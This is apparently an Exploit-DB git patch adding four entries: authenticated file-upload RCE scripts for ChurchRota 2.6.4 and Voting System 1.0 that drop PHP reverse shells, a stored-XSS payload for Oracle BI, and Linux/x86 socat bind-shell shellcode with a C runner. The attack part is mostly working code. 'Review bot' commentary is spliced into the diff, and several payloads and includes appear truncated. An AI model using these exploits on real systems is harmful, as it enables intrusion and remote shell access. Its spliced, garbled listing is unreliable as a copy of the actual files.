From d65226277cbee89a80d143855999788ff89706c5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 21 Jan 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-01-21
4 changes to exploits/shellcodes
ChurchRota 2.6.4 - RCE (Authenticated)
Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
Linux/x86 - Socat Bind Shellcode (113 bytes)
---
 exploits/multiple/webapps/49443.py | 48 ++++++++++++++
 exploits/multiple/webapps/49444.txt | 12 ++++
 exploits/php/webapps/49445.py | 98 +++++++++++++++++++++++++++++
 files_exploits.csv | 3 +
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86/49446.c | 72 +++++++++++++++++++++
 6 files changed, 234 insertions(+)
 create mode 100755 exploits/multiple/webapps/49443.py
 create mode 100644 exploits/multiple/webapps/49444.txt
 create mode 100755 exploits/php/webapps/49445.py
 create mode 100644 shellcodes/linux_x86/49446.c
diff --git a/exploits/multiple/webapps/49443.py b/exploits/multiple/webapps/49443.py
new file mode 100755
index 000000000..a979dd5d8
--- /dev/null
+++ b/exploits/multiple/webapps/49443.py
@@ -0,0 +1,48 @@
+# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
+# Date: 1/19/2021
+# Exploit Author: Rob McCarthy (@slixperi)
+# Vendor Homepage: https://github.com/Little-Ben/ChurchRota
+# Software Link: https://github.com/Little-Ben/ChurchRota
+# Version: 2.6.4
+# Tested on: Ubuntu
+
+import requests
+from pwn import listen
+
+############################################################################################################
+# Description #
+# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. #
+# The user does not need to have file upload permission in order to upload and execute an arbitrary file. #
+# The application is written primarily with PHP so we use PHP in our PoC #
+############################################################################################################
+
+# credentials of the low privilege user
+USERNAME='slixperi'
+PASSWORD='slixperi'
+
+LISTENER_IP = '127.0.0.1'
+LISTENER_PORT = '4444'
+TARGET_IP = '127.0.0.1'
+TARGET_PORT = '8081'
+
+# set the credentials for login POST
+credentials = {"username":USERNAME,"password":PASSWORD}
+# create a session to preserve session state
+sesh = requests.session()
+# login as our low-privilege user (normally only admins can upload files)
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)
+
+# define the payload
+payload = f"$sock, 1=>$sock, 2=>$sock),$pipes); ?>"
+
+# file upload
+sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
+files = {'resourcefile': ("shell.php", payload)}
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)
+
+l = listen(LISTENER_PORT)
+
+# execute the file
+sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
+
+l.interactive()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49444.txt b/exploits/multiple/webapps/49444.txt
new file mode 100644
index 000000000..0079d3cac
--- /dev/null
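Review bot: `LISTENER_IP` is assigned but never read — `listen(LISTENER_PORT)` is called without it — so the settings block advertises a knob that has no effect; either pass it to `listen` or remove the constant. The login POST and the upload POST both discard their responses, so the script proceeds to the `documents/shell.php` request even when authentication or the upload was rejected; `r = sesh.post(...)` followed by `r.raise_for_status()` on each step would make a failure visible instead of silent. The `payload` f-string as shown on this page begins mid-expression and ends in `?>`, which looks like a fragment whose opening was lost in rendering, so this listing may not match the file as committed.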
+++ b/exploits/multiple/webapps/49444.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
+# Exploit Author: omurugur
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
+# Version: 11.1.1.7.140715
+# Author Web: https://www.justsecnow.com
+# Author Social: @omurugurrr
+
+Stored XSS:
+
+“;!—“”=&{(alert(document.cokie))}
+
+Vulnerable area = Dashboard - Add New Text
\ No newline at end of file
diff --git a/exploits/php/webapps/49445.py b/exploits/php/webapps/49445.py
new file mode 100755
index 000000000..d8911c218
--- /dev/null
+++ b/exploits/php/webapps/49445.py
@@ -0,0 +1,98 @@
+# Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
+# Date: 19/01/2021
+# Exploit Author: Richard Jones
+# Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10 2004 + XAMPP 7.4.4
+
+import requests
+
+# --- Edit your settings here ----
+IP = "192.168.1.207" # Website's URL
+USERNAME = "potter" #Auth username
+PASSWORD = "password" # Auth Password
+REV_IP = "192.168.1.207" # Reverse shell IP
+REV_PORT = "8888" # Reverse port
+# --------------------------------
+
+INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
+LOGIN_URL = f"http://{IP}/votesystem/admin/login.php"
+VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php"
+CALL_SHELL = f"http://{IP}/votesystem/images/shell.php"
+
+payload = """
+
+
+"""
+payload = payload.replace("IIPP", REV_IP)
+payload = payload.replace("PPOORRTT", REV_PORT)
+
+s = requests.Session()
+
+def getCookies():
+ r = s.get(INDEX_PAGE)
+ return r.cookies
+
+def login():
+ cookies = getCookies()
+ data = {
+ "username":USERNAME,
+ "password":PASSWORD,
+ "login":""
+ }
+ r = s.post(LOGIN_URL, data=data, cookies=cookies)
+ if r.status_code == 200:
+ print("Logged in")
+ return True
+ else:
+ return False
+
+def sendPayload():
+ if login():
+ global payload
+ payload = bytes(payload, encoding="UTF-8")
+ files = {'photo':('shell.php',payload,
+ 'image/png', {'Content-Disposition': 'form-data'}
+ )
+ }
+ data = {
+ "firstname":"a",
+ "lastname":"b",
+ "password":"1",
+ "add":""
+ }
+ r = s.post(VOTE_URL, data=data, files=files)
+ if r.status_code == 200:
+ print("Poc sent successfully")
+ else:
+ print("Error")
+
+def callShell():
+ r = s.get(CALL_SHELL, verify=False)
+ if r.status_code == 200:
+ print("Shell called check your listiner")
+print("Start a NC listner on the port you
choose above and run...") +sendPayload() +callShell() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dec7d162b..fd319346d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -25887,6 +25887,9 @@ id,file,description,date,author,type,platform,port 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php, +49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple, +49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple, +49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php, 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php, 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index a22c21b2d..91bbba5c5 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -1,6 +1,7 @@
 id,file,description,date,author,type,platform
 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
+49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
diff --git a/shellcodes/linux_x86/49446.c b/shellcodes/linux_x86/49446.c
new file mode 100644
index 000000000..5d02bc4e0
--- /dev/null
+++ b/shellcodes/linux_x86/49446.c
@@ -0,0 +1,72 @@
+/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
+ Date: 01-19-2021
+ Author: Felipe Winsnes
+ Tested on: Debian x86
+ Shellcode Length: 113
+
+global _start
+
+section .text
+
+_start:
+
+ xor eax, eax
+ push eax
+
+ PUSH 0x30303030 ; "tcp-listen:10000"
+ PUSH 0x313a6e65
+ PUSH 0x7473696c
+ PUSH 0x2d706374
+
+ mov esi, esp
+ push eax
+
+ PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
+ PUSH 0x732c746e
+ PUSH 0x69676973
+ PUSH 0x2c646973
+ PUSH 0x7465732c
+ PUSH 0x72726564
+ PUSH 0x74732c79
+ PUSH 0x74702c68
+ PUSH 0x7361623a
+ PUSH 0x63657865
+
+ mov edi, esp
+ push eax
+
+ PUSH 0x7461636f ; "///usr/bin/socat"
+ PUSH 0x732f6e69
+ PUSH 0x622f7273
+ PUSH 0x752f2f2f
+
+ mov ebx, esp
+ push eax
+
+ mov edx, esp
+
+ push esi
+ push edi
+ push ebx
+
+ mov ecx, esp
+ mov al, 11
+ int 0x80
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
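Review bot: `main()` is declared with no return type; implicit `int` was removed in C99 and current GCC/Clang reject it by default, so the harness should read `int main(void)`. The two `#include` lines carry no header name on this page — `printf` and `strlen` need `<stdio.h>` and `<string.h>` — and if that is how the file was committed it does not compile. `strlen` returns `size_t`, so the `%d` in the `printf` format should be `%zu`. The assembly comment on the second argument claims `exec:'bash',...`, but the ten pushed words decode to `exec:bash,pty,stderr,setsid,sigint,sane,` (40 bytes, no quote characters), so the comment does not match the bytes that `code[]` carries. Casting `code[]` to a function pointer and calling it executes from a writable data array, which a default NX/W^X build faults on; the harness only runs where that segment is marked executable.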